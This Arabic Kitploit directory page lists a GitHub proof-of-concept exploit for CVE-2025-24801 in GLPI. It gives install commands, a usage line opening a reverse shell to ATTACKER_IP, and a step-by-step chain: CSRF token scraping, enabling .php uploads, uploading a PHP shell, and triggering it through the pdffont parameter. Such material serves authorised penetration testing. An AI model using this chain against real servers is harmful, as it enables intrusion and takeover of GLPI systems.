Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24801 — استغلال CVE-2025-24801 | Kitploit
أدوات/GitHubGitHub/fatkz/cve-2025-24801
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubfatkz/cve-2025-24801

CVE-2025-24801

استغلال CVE-2025-24801

عرض المستودع
31منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-24801 PoC لثغرة RCE في GLPI

يحتوي هذا المستودع على سكربت إثبات المفهوم (poc.py) الذي يستغل CVE-2025-24801، وهي ثغرة LFI تؤدي إلى RCE في GLPI 10.0.17. يقوم السكربت بأتمتة ما يلي:

  • تسجيل الدخول إلى GLPI
  • تفعيل رفع الملفات بامتداد .php عن طريق تحديث إعدادات نوع المستند
  • رفع شيل عكسي PHP عبر نقطة نهاية رفع الملفات AJAX

🛠️ التثبيت

root@kitploit:~
git clone https://github.com/fatkz/CVE-2025-24801.git
cd CVE-2025-24801
pip install -r requirements.txt

🚀 الاستخدام

root@kitploit:~
python3 poc.py \
  --url https://target.example.com/glpi \
  --user TECHNICIAN_USER \
  --password "PASSWORD" \
  --lhost ATTACKER_IP \
  --lport 4444
  • --url: عنوان URL الأساسي لمثيل GLPI (مثل https://example.com/glpi)
  • --user / --password: بيانات اعتماد فني GLPI صالحة
  • --lhost / --lport: عنوان IP والمنفذ الخاصان بالمهاجم لمستمع الشل العكسي

يستخدم السكربت تلقائيًا --doc-id 1 افتراضيًا لتحديث نوع المستند الأول.

بعد التنفيذ، سيقوم السكربت بما يلي:

  1. تسجيل الدخول وإنشاء جلسة
  2. تفعيل رفع الملفات بامتداد .php عن طريق تحديث نوع المستند برقم 1
  3. رفع exploit.php الذي يحتوي على حمولة شل عكسي PHP

بعد ذلك، ستحتاج إلى تشغيل ثغرة LFI يدويًا عن طريق تحديد اسم الملف المرفوع في تضمين خط PDF (على سبيل المثال، عبر ميزة تصدير التقرير) لتحقيق RCE.

📑 كيف يعمل

  1. تسجيل الدخول: يستخرج رمز CSRF من /front/login.php ويرسل بيانات الاعتماد للمصادقة.
  2. تفعيل رفع ملفات PHP: يجلب /front/documenttype.form.php?id=1، ويحلل رمز CSRF، ويضيف php إلى الامتدادات المسموح بها.
  3. رفع الشل: يجلب /front/ticket.form.php للحصول على رمز CSRF، ثم يستخدم /ajax/fileupload.php (مع X-Requested-With: XMLHttpRequest) لرفع شل عكسي PHP.
  4. تشغيل RCE: استدعِ ثغرة LFI في خط PDF يدويًا عن طريق تحديد اسم ملف الشل المرفوع في معامل pdffont أثناء تصدير التقرير.

⚠️ إخلاء مسؤولية

هذه الأداة مخصّصة لاختبار الاختراق المصرّح به والأغراض التعليمية فقط. لا تستخدمها ضد أنظمة دون إذن صريح.


أُنشئت لأغراض تعليمية واختبار الاختراق المصرّح به.

تنزيل الأداة